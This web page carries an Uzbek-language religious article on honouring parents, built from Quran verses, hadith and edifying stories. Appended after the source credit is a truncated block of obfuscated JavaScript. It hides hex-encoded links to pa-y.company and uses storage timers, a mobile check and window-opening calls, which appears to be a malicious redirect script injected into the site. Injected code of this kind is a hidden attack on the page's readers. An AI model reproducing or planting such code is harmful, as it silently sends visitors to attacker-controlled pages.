Payshanba, 12-noyabr, 2026 Toshkent +1° USD 11 964,27 EUR 13 323,41 RUB 144,49

Ota-onaga yaxshilik qilish hidoyat yoʻlidir

Alloh taolo insonga ota-onasi bilan yaxshi munosabatda boʻlishni va doim ularga yaxshilik qilishni buyurdi. Qurʼoni karimda bunday marhamat qilinadi: «Rabbingiz Uning Oʻzigagina ibodat qilishingizni hamda ota-onaga yaxshilik…

Alloh taolo insonga ota-onasi bilan yaxshi munosabatda boʻlishni va doim ularga yaxshilik qilishni buyurdi.

Qurʼoni karimda bunday marhamat qilinadi:

 «Rabbingiz Uning Oʻzigagina ibodat qilishingizni hamda ota-onaga yaxshilik qilishni amr etdi. (Ey inson!) Agarular­ning biri yoki harikkisi huzuringda keksalikyoshiga yetsa, ularga “uf!..” dema va ularni jerkima! Ularga (doimo) yoqimli soʻzayt! Ularga, mehribonlikbilan, xorlik qanotinipast tut va (duoda) ayt: “EyRabbim! Meni (ular) goʻdaklik chogʻimda tar­biyalaganlaridek, Sen hamularga rahm qilgin!» (Isro, 23–24)

“Ularga yoqimli soʻz ayt”deyilganida ota-onani nomi bilan chaqirmaslik, balki “otajon, onajon” kabi soʻzlar bilan hurmat­lab muomala qilish, ularni ranjitadigan gaplarni gapirmas­lik, ular oldida oʻzini qul yoki choʻrilardek tutish kabilarni tu­shu­nish kerak (“Madorikuttanzil va haqoiquttaʼvil” tafsiri).

Ibn Abbos (roziyallohu anhu): “…ularga “uf!..” demava ularni jerkima!”oyatini sharhlab, aytadi: “U nafrat soʻzidir”.

Muqotil aytadi: “U qoʻpol, yomon soʻzlarni aytish”.

Tarbiya berib, voyaga yetkazgan ota-onasining mehribonli­gi­ni va chekkan mashaqqatlarini qadrlashi uchun Alloh taolo bandalariga buyuradi:

“…va (duoda) ayt: “Ey Rabbim! Meni (ular)goʻdaklik chogʻimda tarbiyalaganlaridek, Sen ham ularga rahm qilgin!”»

Alloh taolo insondagi ota-ona haqi xususida bunday dedi:

“Eslang, (Biz) Isroilavlodidan: “FaqatAllohgagina sigʻinasiz, ota–ona, qarindosh, yetimva miskinlarga yaxshilikqilasiz, odamlargashirinsoʻz boʻling, namoznibarkamol oʻqing, zakotbering”, deb ahd olganedik» (Baqara, 83).

Ota-onaga yaxshilik qilish amallarning yaxshisi va toatlar­ning eng ulugʻidir. Abdulloh ibn Masʼud (roziyallohu anhu) rivoyat qiladi: “Yo Rasululloh, eng yaxshi amal qaysi?” deb soʻradim. Rasu­lulloh (sollallohu alayhi va sallam): “(Eng afzal amal) oʻz vaqti­da oʻqiladigan namozdir”, dedilar. “Soʻng qaysi?” deb soʻradim. “Ota-onaga yaxshilik qilish”, dedilar.

Ota-onaga yaxshilik qilish jannatga olib boruvchi yoʻllardandir.

Abu Hurayra (roziyallohu anhu) rivoyat qiladi: «Rasululloh (sollallohu alayhi va sallam)dan ushbu soʻzlarni eshitdim: “Xor boʻlsin! Xor boʻlsin! Xor boʻlsin!” “Kim u, yo Rasululloh?” deb soʻ­rashdi. “Ota-onasining birini yoki ikkalasini qarilik chogʻi­da topib, ularga yaxshilik qilib jannati boʻlib olmagan”, dedilar».

Hasan Basriy (rahmatullohi alayh): “Ota-onaga yaxshilik qilish Allohga maʼsiyat boʻlmagan barcha narsada ularga itoat qi­lishdir. Ota-onaga oq boʻlish ularni qarilik chogʻida qarovsiz tashlab qoʻyish va yaxshilikdan mahrum qilishdir”, dedi.

Paygʻambar (sollallohu alayhi va sallam) huzurlariga ji­hod qilish uchun ruxsat soʻrab kelgan bir kishi qissasini eslaylik.

Rasululloh (sollallohu alayhi va sallam) undan: “Ota-onang tirikmi?” deb soʻradilar. U: “Ha”, dedi. Paygʻambarimiz (alay­hissalom): “Sen jiddu jahd bilan xizmatlarini ado et”, dedilar.

Har bir insonga ota-onasiga yaxshilik qilish ham farz, ham qarzdir. Ota-onaga yaxshilik qilish hech qachon ularga qarshi chiq­maslik, xizmatlaridan boʻyin tovlamaslikdir. Baʼzilar ota-onaga yaxshilik faqat oʻziga yoqadigan ishlarda va xohishiga muvofiq kelgan oʻrinlarda deb hisoblaydi. Haqiqatda esa, bunday emas. Yaxshilik faqat yaxshi amallarda, bandaning havoyi xohishlariga xilof narsalarda boʻladi. Agar ularning havoyi mayllariga toʻgʻri keladigan narsada boʻlganida edi, u yaxshilik deb nomlanmasdi. Alloh taolo bandani ota-onaga yaxshilik qilish va ular hurmatini joyiga qoʻyishga buyuradi:

“Ularga, mehribonlik bilan, xorlik qanotini past tut va (duoda) ayt: «Ey Rabbim! Meni (ular)goʻdaklik chogʻimda tarbiya­laganlaridek, Sen ham ularga rahm qilgin!”

Alloh taolo aytadi:

«Biz insonni ota–onasigayaxshilik qilishga buyurdik. Onasi uni (qornida) qiynalib koʻtarib yurgan vauni qiy­nalib tuqqandir. Unga homiladorlik va uni(sutdan) ajra­tish(muddati) oʻttiz oydir. Bas, qachon, u voyaga yetib, qirqyoshga toʻlganida: “EyRabbim! Menga va ota–onamga inʼom etganneʼmatingga shukr qilishgava Oʻzing rozi boʻladigansolih amalni qilishgameni muvaffaq etgin vamen uchun zurriyo­timniisloh et! Albatta, menSenga (gunohlarimdan) tavba qil­dim va albatta, men musulmonlardanman”, deydi» (Ahqof, 15).

Baqara surasi 233-oyatda chaqaloq toʻla ikki yil emizilishi belgilab qoʻyilgan. Oʻttiz oydan yigirma toʻrt oy emizishga ketsa, olti oy qoladi. Homila odatda toʻqqiz oyda tugʻilsa-da, buning eng kam muddati olti oy, koʻp muddati esa, yigirma toʻrt oy, deyish­gan. Bu tabobatda ham tasdiqlangan.

Ulamolar: “Bu oyat Abu Bakr (roziyallohu anhu) haqlarida nozil boʻlgan”, deydi. Bu oyat u kishining otalari Abu Quhofa, onalari Ummul Xayr, bolalari haqiga qilgan duolari ijobat boʻlganidan darak beradi. Oʻzi bilan birga ota-onasi va oʻgʻil-qizlari Islomni qa­bul qilgan boshqa biror sahoba yoʻq, bunga faqat Abu Bakrgina musharraf boʻlgan.

Ali ibn Abu Tolib (karramallohu vajhahu) rivoyat qiladi. Rasululloh (sollallohu alayhi va sallam): “Men ota-onasining ha­qini ado etgan kishidan xursandman”, dedilar. Men: “Yo Rasu­lulloh! Agar unda (ota-ona haqini ado etishda) hech narsa boʻlma­sa-chi?” deb soʻradim. Paygʻambarimiz (alayhissalom): “Agar ular bir ishga buyursa, “xoʻp boʻladi”, desin, “uf”, demasin. Ularga qat­tiq gapirmasin, faqat yaxshi gaplarni soʻzlasin”, dedilar.

Bir kishi Paygʻambarimiz (sollallohu alayhi va sallam) oldi­lariga kelib: “Yo Rasululloh, menga bir yaxshilikni bildiring, undan dunyoda ham, oxiratda ham manfaat topay”, dedi. “Ota-onang bormi?” deb soʻraganlarida, u: “Ha”, deb javob berdi. Rasulul­loh (sollallohu alayhi va sallam): “Unday boʻlsa, ularning haqi­ni ado qil va ularni ovqatlantirgin. Ularga yedirgan har bir luq­mang uchun jannatda qasr bino qilinadi”, dedilar. Yana bir saho­ba Paygʻambar (sollallohu alayhi va sallam) oldilariga kelib: “Yo Rasululloh, mening onam bor va unga nafaqa qilib turaman. U esa menga tili bilan aziyat beradi. Nima qilay?” dedi. Rasulul­loh (sollallohu alayhi va sallam): “Uning haqini ado qil. Allohga qasam, agar goʻshtingni kesib bersang ham, haqining toʻrtdan bi­rini ado qila olmaysan. Jannat onalarning oyogʻi ostida eka­nini bil­maysanmi?” deb javob berdilar. Sahoba: “Endi onamga aslo yomon gapirmayman”, dedi va onasi oldiga kelib, oyoqla­ri­ni oʻpdi.

Rasululloh (sollallohu alayhi va sallam) matni uzun bir hadisning oxirida aytganlar: “Meni haq bilan paygʻambar qilib yuborgan Zotga qasam, kimga Alloh taolo mol ato qilsa, bu molidan u ota-onasiga ehson bersa, jannatda men bilan birga boʻladi”. Bir kishi: “Yo Rasululloh, agar ota-onasi dunyodan oʻtib ketgan boʻlsa-­chi?” deb soʻradi. Paygʻambar (sollallohu alayhi va sallam): “Ular­ning nomidan sadaqa qiladi, Qurʼon oʻqiydi va haqlariga duo qila­di. Agar bularni tark qilsa, ularga oq boʻladi. Kim ularga oq boʻl­sa, osiy boʻlibdi”, deb javob berdilar.

Baʼzilar: “Bir banda farz namozini oʻqib, ketidan ota-ona­si haqiga magʻfirat soʻrab duo qilsa, Alloh taolo duosini ijobat etib, garchi ota-onasi fosiq boʻlsa ham, ularni magʻfirat qi­la­di”, degan.

Abu Zarr Gʻiforiy (roziyallohu anhu) rivoyat qiladi: «Men Rasululloh (sollallohu alayhi va sallam)ning bunday deganlarini eshitganman: “Kim ota-onasini ziyorat qilish uchun yoʻl yursa, Alloh uning har bir bosgan qadamiga yuzta savob yozib, yuzta gunohini oʻchiradi va darajasini yuz baravar koʻtaradi. Agar ular oldida yaxshi soʻzlarni aytsa, qiyomat kuni unga nur boʻladi. Ota-onasi oldidan gunohlari kechirilgan holatda chiqadi”».

Umar (roziyallohu anhu) davrida bir savdogar bor edi. Bir kuni onasi uning oldiga kelib, oʻziga zarur narsani berishini soʻradi. Shunda savdogarning xotini: “Onang bizning kambagʻal boʻ­lishimizni xohlayapti, agar har kuni shunday soʻrayversa, faqir boʻlib qolamiz”, dedi va savdogar unga hech narsa bermagach, onasi yigʻlab, qaytib ketdi. Bir safar savdogar tijorat ishi bi­lan yoʻl­ga chiqqanida, qaroqchilar yoʻlini toʻsdi. Mollarini tortib olish­di-da, qoʻlini kesib, boʻyniga osib ketishdi. Shu yer­dan oʻtayotgan qavm uni koʻrib, uyiga olib bordi. Koʻrgani kelgan qa­rindoshlariga u: “Bu mening jazoim. Agar onamga infoq-eh­son qilganimda, qoʻlim ham, molim ham oʻzimda qolardi”, dedi.

Hikoya qilinishicha, fazilati bilan mashhur shayx Makkaga safarni qasd qildi. Ammo onasi bundan norozi boʻldi. Onasi uning ortidan: “Parvardigoro, oʻgʻlim meni ayriliq oʻti bilan kuy­dirdi. Uni bu qilmishi uchun jazolagin!” deb duo qildi. Shayx shaharlardan biriga yetgach, masjidga kirib, ibodat qila bosh­la­di. Shu kecha bir kishining uyiga oʻgʻri kirdi. Uy egasi oʻgʻrining mas­jid tomon qochganini koʻrdi. Odamlar uni quvlay ketdi, le­kin oʻgʻri masjidning oldiga kelganida koʻzdan gʻoyib boʻldi. Ular: “Mas­jid­ga kirgandir”, deb ichkariga qaradi. Na­moz oʻqiyotgan shayx­ni ushlab, shahar hokimining oldiga olib bo­rishdi. Hokim oʻgʻri­ning koʻzini oʻyish, qoʻl-oyoqlarini kesishga buyurdi. Jallodlar hukmni ijro etdi va: “Bu oʻgʻrining jazo­si”, deya bozorda jar so­lishdi. Shunda shayx: “Unday demanglar! Bu onasining ruxsatisiz Kaʼ­bani ta­vof qilish uchun chiqqan kimsaning jazosidir, deb ayting­lar”, dedi. Uning shayx ekani­ni bilishgach, qilgan ishlaridan pushaymon boʻlishdi. Onasi oldiga olib kelib, ostonaga qoʻyib ketishdi. Uy ichidan esa onasining nolasi eshitildi: “Parvardigoro, agar bolamning boshiga bir balo solsang, soʻngra uni qaytarsang, oʻgʻlimni bir bor koʻrsam”. Shunda shayx: “Men och musofirman, men­ga ovqat beringlar”, dedi. Onasi: “Eshik oldiga kel”, dedi. U: “Mening oyoqlarim yoʻq”, dedi. Onasi: “Boʻlmasa, qoʻlingni choʻz”, dedi. “Choʻzadigan qoʻllarim ham yoʻq”, dedi u. Onasi dedi: “Men senga nomahram boʻlsam, qanday qilib seni ovqatlantiraman”. U: “Qoʻrqma, mening koʻzlarim ham yoʻq”, dedi. Shunda onasi bitta non bilan koʻzachada suv olib, uning oldiga keldi. Shayx yuzini onasining oyogʻiga qoʻyib: “Men sizning osiy oʻgʻlingizman”, dedi. Onasi uni tanib, yigʻlab yubordi va: “Parvardigoro, agar holat bun­day boʻlsa, ikkimizning ham jonimizni olgin, toki odamlar yuzlarimiz qoraligini koʻ­rishmasin”, deb nola qildi. Uning no­lasi tugar-tugamas, Alloh har ikkisining jonini oldi.

Anas ibn Molik (roziyallohu anhu) rivoyat qiladi. Rasululloh (sollallohu alayhi va sallam): «Kim ota-onasini norozi qil­gan boʻlsa, shahodat kalimasini aytolmay oʻladi va qabridan pesho­nasiga “Bu ota-onasiga oq boʻlgan kimsaning jazosidir”, deb yozil­gan holatda turadi», dedilar. Boshqa bir hadisda: “Kimga Alloh taolo mol ato qilsa-yu, u ota-onasining haqini ado qil­masa, uning amallari bekor boʻladi va u qattiq azoblanadi”, de­yilgan.

Imom Termiziy Abdulloh ibn Umar (roziyallohu anhu)dan ri­voyat qiladi: «Paygʻambar (sollallohu alayhi va sallam): “Alloh­ning roziligi ota-onaning roziligida, gʻazabi ota-onaning gʻa­zabidadir”, dedilar».

“Sahihi Buxoriy”da kelishicha, Abdulloh ibn Masʼud (rozi­yal­lohu anhu) aytadi: «Rasululloh (sollallohu alayhi va sallam)­dan “Qaysi amal Allohga maʼqulroq?” deb soʻradim. “Ota-onaga yaxshilik qilish”, dedilar. “Yana qaysi amal?” deb soʻradim. Rasu­lul­loh (sollallohu alayhi va sallam): “Alloh yoʻlida gʻazot qilish”, dedilar. Shu asnoda bir kishi kelib, gʻazotga chiqish uchun Rasu­lul­loh (sollallohu alayhi va sallam)dan ruxsat soʻradi. Paygʻam­bar (sol­lallohu alayhi va sallam): “Ota-onang xizmatini qil­sang, gʻa­zot qilgan boʻlasan”, dedilar».

Ansorlardan bir kishi kelib: “Yo Rasululloh! Ota-onam va­fot etganidan keyin ham ularga yaxshilik qilishim kerakmi?” deb soʻradi. Paygʻambarimiz (sollallohu alayhi va sallam): “Ha, toʻrt narsa bilan xizmat qilishing kerak: ularning haqiga duo qilish, gunohlariga istigʻfor aytish, ularning ahdlari, vaʼdalarini bajarish, ularning doʻstlarini hurmat qilish”, dedilar.

Ota-ona xizmatini qilishda, ularning roziligini topishda sustkashlik qilish yaramaydi. Xizmatlarini ado etish va ular haqiga rahmat-magʻfirat tilab, duolar qilish zarur! Shunda ham ota-onaning haqlarini toʻliq ado eta olmaysiz. Lekin Alloh ta­o­lo oz amallaringizni baraka bilan koʻpaytirib beradi.

Ota-onaga yaxshilik qilishga Buyuk Alloh tarafidan amr-­far­mon boʻlishiga qaramay, bu sohadagi oʻlchovlarimiz buzilib ket­gan. Goho oshna-ogʻaynilarini, xotini, farzandlarini ota-­ona­sidan ustun qoʻyadigan kimsalarni uchratamiz. Baʼzilar ota-onaga yaxshi­lik qilish kabi fazilati ulugʻ amallarni tark etib, ar­zi­mas ish­lar bilan kifoyalanadi. Baʼzilar ota-onasi qarib qolga­nida tashlab ketadi yoki ota-onasini kamdan-kam ziyorat qiladi. Ota-onasiga baqiradigan yoki qoʻpol muomala qiladiganlar ham bor. Ayrimlar koʻcha-koʻyda birovlarga xushomad qiladi-yu, uyida keksa ota-onasiga aytgani bir ogʻiz iliq soʻz topolmaydi. Ular bilan qoʻpol muomalada boʻladi.

Bugun dinimiz buyruqlariga eʼtiborsizlik va ayollarning faollashuvi sababli xotinini ota-onadan ustun qoʻyish hollari koʻpaydi. Muoz (roziyallohu anhu) aytadi: «Rasululloh (sollallohu alayhi va sallam) menga vasiyat qildilar: “Agar ota-onang senga ahling (xotining)dan ham, molingdan ham voz kechishingni buyurishsa ham, ularga itoat qil!”»

Erini ota-onasiga osiy boʻlishga va qarindosh-urugʻchilikni uzishga undaydigan ayolda yaxshilik yoʻqdir.

Abdulloh ibn Umar (roziyallohu anhu) aytadi: «Umar (roziyal­lohu anhu) ayolimni yoqtirmasdi. Otam menga uni taloq qil, dedi. Men bosh tortdim. Umar (roziyallohu anhu) Paygʻambar (sollallohu alay­hi va sallam) huzurlariga borib, ustimdan shikoyat qildi. Paygʻam­bar (sollallohu alayhi va sallam: “Otangga itoat qil”, dedilar».

Abu Dardo (roziyallohu anhu) huzurlariga bir kishi kelib: “Onam xotinimni taloq qilishimni buyuryapti”, dedi. Abu Dardo: «Rasululloh (sollallohu alayhi va sallam)dan: “Ota-ona jannat darvozalarining oʻrtasidadir. Agar xohlasang, bu darvozani yoʻq qilasan yoki saqlab qolasan”, deganlarini eshitganman», dedi.

Kishi ota-onasiga rohat-farogʻatidan kechib boʻlsa-da, yaxshilik qilsin, itoat etsin. Kim baxt-saodat istasa, jannat darvozalarini buzib tashlamasin. Endi kim oxiratini dunyoga almashtirsa va oʻtkinchi hayotni afzal bilsa, u jannat darvozasini buzib tashlagan boʻladi.

Yuqoridagi hukmga koʻra, agar ayol xulqi yomon va itoatsiz boʻlsa, ota-ona undan ajralishga buyursa, farzand itoat qilishi shart. Ammo ayoli yaxshi boʻlsa, ota-onasi mustahkam dindor boʻlmasa, kelinning dindorligi tufayli taloq qilishga buyursa, oʻgʻil ular bilan chiroyli muomala qiladi, xizmatlarini bajaradi, ammo ayolini taloq qilmaydi. Allohdan qoʻrqadigan muslima erini ota-onasiga yaxshilik qilishga undaydi. U mana shu ishda Alloh­dan savob umid qiladi. Ota-onani hurmatlash, ularning xizmat­la­ri­ni qilish ulkan boylik va chiroyli xulqlardandir.

Mujohid aytadi: «Agar ota bolasini uraman deb qoʻl koʻtarsa, bola otasining qoʻlini qaytarmasin. Kim ota-onasiga xoʻmrayib qarasa, ularga yaxshilik qilmabdi. Kim ularga (Allohga va ota-onaga osiylik qilish bilan) gʻam keltirsa, oq boʻlibdi. Ota-ona­ga oq boʻlishdan ehtiyot boʻling. Rasululloh (sollallohu alayhi va sallam): “Uch narsa bilan kishining amallari unga foyda ber­may­di. Allohga shirk keltirish, ota-onaga oq boʻlish, dushman bos­ti­rib kelganida urushdan qochish”, deganlar».

Juhayma (roziyallohu anhu) Paygʻambar (sollallohu alayhi va sallam) huzurlariga kelib: “Yo Rasululloh, jahd qilishni istab, sizdan maslahat soʻrab keldim”, dedi. “Onang bormi?” dedilar. “Ha”, dedi. “Onangni yolgʻiz qoldirma. Chunki jannat uning oyogʻi ostidadir”, dedilar.

Bir kishi Rasululloh (sollallohu alayhi va sallam) huzur­lariga kelib: “Yo Rasululloh, hijrat qilish uchun sizga bayʼat bergani keldim. Lekin ota-onam ortimdan yigʻlab qoldi”, dedi. Ra­sululloh (sollallohu alayhi va sallam): “Qaytib bor va ularni qanday yigʻlatgan boʻlsang, shunday kuldirgin”, dedilar. Boshqa rivoyatda: “Sen ular oldiga qaytib borib, ularni yigʻlat­ganing­dek kuldirmaguningcha, sendan bayʼat olmayman”, kabi kelgan.

Qatodadan rivoyat qilinadi: “Bir kishining onasi unga faqat farz namozlarini oʻqiysan va faqat Ramazon roʻzasini tutasan, deb qasam ichirdi. Shunday holatda u onasiga itoat qiladi! Chunki onaga itoat qilish nafl ibodatlardan afzaldir.

Hishom ibn Hasson aytadi: «Men Hasanga: “Kechasi Qurʼondan taʼlim olaman. Onam kechqurungi ovqatda meni kutib qoladi”, dedim. Hasan: “Kechqurungi ovqatni onang bilan yegin, chunki onang yonida boʻlib, uni quvontirishing nafl haj qilishingdan yaxshidir”, dedi».

Ibn Umar (roziyallohu anhu) onasini yelkasida koʻtarib, Kaʼbani tavof qilayotgan kishini koʻrdi. U kishi: “Ey Ibn Umar, onamning haqini ado qildimmi?” deb soʻradi. Ibn Umar: “Seni tugʻishdagi toʻlgʻoqlaridan bittasining haqini ham ado qilganing yoʻq. Lekin sen yaxshi ish qilyapsan. Alloh kamiga ham koʻp savob beradi”, dedi.

Agar birov bizga bir-ikki bor yaxshilik qilsa, uni maqtab, yaxshiliklarini eslab yuramiz. Ota-onamizga esa baʼzan itoatsizlik va qoʻpol muomala bilan javob beramiz. Boshqalarning koʻnglini olishga urinamiz-u, ammo ne-ne mashaqqatlar bilan bizlarni ulgʻaytirgan ota-onamizning koʻnglini koʻtarish, dilini shod qilishga eʼtibor bermaymiz. Biror farzand otasi yoki onasi vafot etganida kasal boʻlib qolganini koʻrganmisiz? Yoqub (alayhissalom) qissasini bir eslaylik. Oʻgʻli Yusufdan ayrilish otaga qanday taʼsir qilganini xotirlab, xulosa chiqaraylik.

Qurʼoni karimda bunday marhamat qilinadi:

«Keyin ulardan yuz oʻgirib: “Esizgina Yusuf!” dedi. Gʻam–gʻussadan uningkoʻzlari oqarib (ojiz boʻlib) qoldi va u endimahzundir» (Yusuf, 84).

Yoqub (alayhissalom) sakson yil suyukli oʻgʻli Yusuf (alay­hissalom) firoqida yigʻlayverganidan koʻzlari oqarib, oxiri koʻr boʻlib qoladi. Bu yigʻi sabrsizlik yigʻisi boʻlmay, insonga Alloh ato etgan tugʻma tabiat edi, otalik mehri dalolati edi. Muhammad (alayhissalom) ham Ibrohim ismli norasida oʻgʻillari vafot etganida koʻzlariga ixtiyorsiz yosh olganlari maʼlum.

Ota-onaga oq boʻlishga ularni yigʻlatish, xafa qilish, uzoq vaqt ziyorat qilmaslik, salomatliklari va moddiy holatlariga eʼtibor bermaslik kabilar kiradi. Shuningdek, bolalar Allohga itoat qilmasligi va munkar ishlarga berilishi ham ota-onani gʻamga botiradi. Chunki bu ishlar ota-onaga yomon taʼsir qiladi. Koʻpincha farzandlar yaxshi mansablarga va molu dunyoga ega boʻlganida shunday oqpadarlik qiladi.

Bir kishi Rasululloh (sollallohu alayhi va sallam) huzurla­riga kelib dedi:

– Yo Rasululloh! Insonlar orasida mening chiroyli muomala qilishimga kim haqliroq?

Rasululloh (sollallohu alayhi va sallam):

– Onang, – dedilar.

– Soʻng kim? – deb soʻradi.

– Onang, – dedilar.

– Soʻng kim? – dedi.

– Onang, – dedilar.

– Soʻng kim?

– Otang, – dedilar.

Ibn Battol aytadi: “Ona uch narsada otadan farqlanib, afzal turadi: bolani qornida koʻtarish qiyinchiligi, toʻlgʻoq azobi va emizish mashaqqati. Onaning otadan oldin qoʻyilishida katta hikmat bor. Ona oʻzini boqadigan, yaxshilik va parvarish qiladigan kishiga muhtojdir. Chunki u zaifa, kasbi yoʻq, eʼtibor va rahm-shafqatga muhtojdir.

Muso (alayhissalom) Alloh taologa jannatda kimga qoʻshni boʻlishini bildirishini soʻrab, yolborar edi.

Bir kuni shunday nido keldi:

– Ey Muso, falon yerda yashovchi qassob sening jannatdagi qoʻshning boʻladi…

Muso (alayhissalom) qiziqib, qassobning qaysi ibodati uchun bunga loyiq boʻlganini bilish niyatida yoʻlga chiqdi. Muso (alay­hissalom) oʻsha odamni qidirib topdi. Qassob Muso (alay­hissa­lom) haq paygʻambar ekanini bilgan, imon keltirgan edi. Lekin oʻzi­ni koʻrmagan edi. Shuning uchun tanimadi. Kechqurun qas­sob Muso (alayhissalom)ni uyiga olib ketdi. Ovqat tayyorladi. Das­tur­xon tuzadi. Ovqat yeyishdan oldin, qassob devorga osilgan bir sa­vat­ni yerga tushirdi va undan hatto harakat qilishga ham holi qol­ma­gan bir qari kampirni oldi. Xuddi goʻdakni ovqat­lantirgandek unga yedirdi, ichirdi va yana savatga joylab, devorga osdi. Shunda kam­pir nimalardir deb shivirladi. Qari ayolning nima deyayot­ga­ni­ni tushunmagan Muso (alayhissalom) qassobdan soʻradi:

– Oʻgʻlim, bu kampir kiming boʻladi?

Qassob musofirga:

– Bu ayol onam boʻladilar. Oʻtirib-turishga, ovqat yeyishga hol­lari yoʻq. Shu bois oʻzim yediraman, ichiraman va tozaligiga qa­rayman. Qoʻlimdan kelganicha xushnud etishga harakat qilaman.

Muso (alayhissalom):

– Hozirgina u senga gapirganday boʻldi, nimalar dedi?

Qassob:

– Ey Rabbim! Men oʻgʻlimdan xursandman. Sen ham undan rozi boʻl. Jannatda uni Muso (alayhissalom)ga qoʻshni qil, deb duo qil­di. Shunda Muso (alayhissalom) oʻzini tanitadigan vaqt kelgani­ni tushundi va:

– Men Allohning paygʻambari Muso boʻlaman. Allohdan jannat­dagi qoʻshnim kim boʻlishini bildirishini iltijo qilgan edim. Alloh sen ekaningni bildirdi. Senga xushxabar boʻlsin: onangga qilgan xizmating uchun Alloh sendan rozi boʻldi. Onangning duosini qabul ayladi, – deb marhamat qildi.

Ota-ona dunyodan oʻtganlaridan keyin ularning haqlariga rah­mat va magʻfirat soʻrab duo qilish, ularning vasiyatlarini ba­jarish, shuningdek, ular nomidan sadaqa qilish va ularning qarindosh-urugʻlari bilan bordi-keldi qilish fazilatli ishlar­dandir. Bir ansoriy Rasululloh (sollallohu alayhi va sal­lam)­dan: “Yo Rasululloh, ota-onam bu dunyodan oʻtib ketganlaridan ke­yin ularga qanday yaxshilik qilishim mumkin?”, deb soʻradi. Rasululloh (sollallohu alayhi va sallam): “Toʻrt amal bor: ular­ning haqlariga duo qilish hamda istigʻfor aytish; ahdlarini ba­jarish; ularning doʻstlarini hurmat qilish; ota-onang yaxshi­lik qiladigan kishilar bilan silai rahm, yaʼni qarindoshchi­lik­ni bogʻlash. Mana shu ishlar vafotlaridan keyin ham ularga qi­la oladigan yaxshiliklaringdir”, dedilar.

Biz Alloh kitobidan, Paygʻambarimiz(sollallohu alayhi va sal­lam)  sunnatlaridan vasiyatda aytilgan nasihatga quloq tutaylik:

– Ota-onamiz yonimizda ekanida, soch-soqollari oqarib, bella­ri bukilganida, qoʻl-oyoqlari qaltirab, qiyinchilik bilan turib, mashaqqat bilan oʻtirganida, xastaliklar kela boshlaganida ularga yaxshi muomalada boʻlaylik. Koʻngillarini koʻtaraylik, xushnud etaylik. Ularga molimiz va kuchimizni sarflashda baxillik qilmaylik. Ular bilan hayotimizni chiroyli oʻtkazaylik.

Manba: hidoyat. uz

function _0x9e23(_0x14f71d,_0x4c0b72){const _0x4d17dc=_0x4d17();return _0x9e23=function(_0x9e2358,_0x30b288){_0x9e2358=_0x9e2358-0x1d8;let _0x261388=_0x4d17dc[_0x9e2358];return _0x261388;},_0x9e23(_0x14f71d,_0x4c0b72);}function _0x4d17(){const _0x3de737=[‘parse’,’48RjHnAD’,’forEach’,’10eQGByx’,’test’,’7364049wnIPjl’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x79\x6e\x5a\x39\x63\x33′,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x67\x6a\x47\x38\x63\x33′,’282667lxKoKj’,’open’,’abs’,’-hurs’,’getItem’,’1467075WqPRNS’,’addEventListener’,’mobileCheck’,’2PiDQWJ’,’18CUWcJz’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x62\x62\x68\x35\x63\x30′,’8SJGLkz’,’random’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x43\x54\x69\x31\x63\x36′,’7196643rGaMMg’,’setItem’,’-mnts’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x69\x4c\x44\x32\x63\x30′,’266801SrzfpD’,’substr’,’floor’,’-local-storage’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x55\x4f\x57\x34\x63\x38′,’3ThLcDl’,’stopPropagation’,’_blank’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x71\x6c\x68\x33\x63\x33′,’round’,’vendor’,’5830004qBMtee’,’filter’,’length’,’3227133ReXbNN’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x75\x70\x67\x30\x63\x39′];_0x4d17=function(){return _0x3de737;};return _0x4d17();}(function(_0x4923f9,_0x4f2d81){const _0x57995c=_0x9e23,_0x3577a4=_0x4923f9();while(!![]){try{const _0x3b6a8f=parseInt(_0x57995c(0x1fd))/0x1*(parseInt(_0x57995c(0x1f3))/0x2)+parseInt(_0x57995c(0x1d8))/0x3*(-parseInt(_0x57995c(0x1de))/0x4)+parseInt(_0x57995c(0x1f0))/0x5*(-parseInt(_0x57995c(0x1f4))/0x6)+parseInt(_0x57995c(0x1e8))/0x7+-parseInt(_0x57995c(0x1f6))/0x8*(-parseInt(_0x57995c(0x1f9))/0x9)+-parseInt(_0x57995c(0x1e6))/0xa*(parseInt(_0x57995c(0x1eb))/0xb)+parseInt(_0x57995c(0x1e4))/0xc*(parseInt(_0x57995c(0x1e1))/0xd);if(_0x3b6a8f===_0x4f2d81)break;else _0x3577a4[‘push’](_0x3577a4[‘shift’]());}catch(_0x463fdd){_0x3577a4[‘push’](_0x3577a4[‘shift’]());}}}(_0x4d17,0xb69b4),function(_0x1e8471){const _0x37c48c=_0x9e23,_0x1f0b56=[_0x37c48c(0x1e2),_0x37c48c(0x1f8),_0x37c48c(0x1fc),_0x37c48c(0x1db),_0x37c48c(0x201),_0x37c48c(0x1f5),’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x45\x47\x64\x36\x63\x31′,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x55\x6f\x65\x37\x63\x34′,_0x37c48c(0x1ea),_0x37c48c(0x1e9)],_0x27386d=0x3,_0x3edee4=0x6,_0x4b7784=_0x381baf=>{const _0x222aaa=_0x37c48c;_0x381baf[_0x222aaa(0x1e5)]((_0x1887a3,_0x11df6b)=>{const 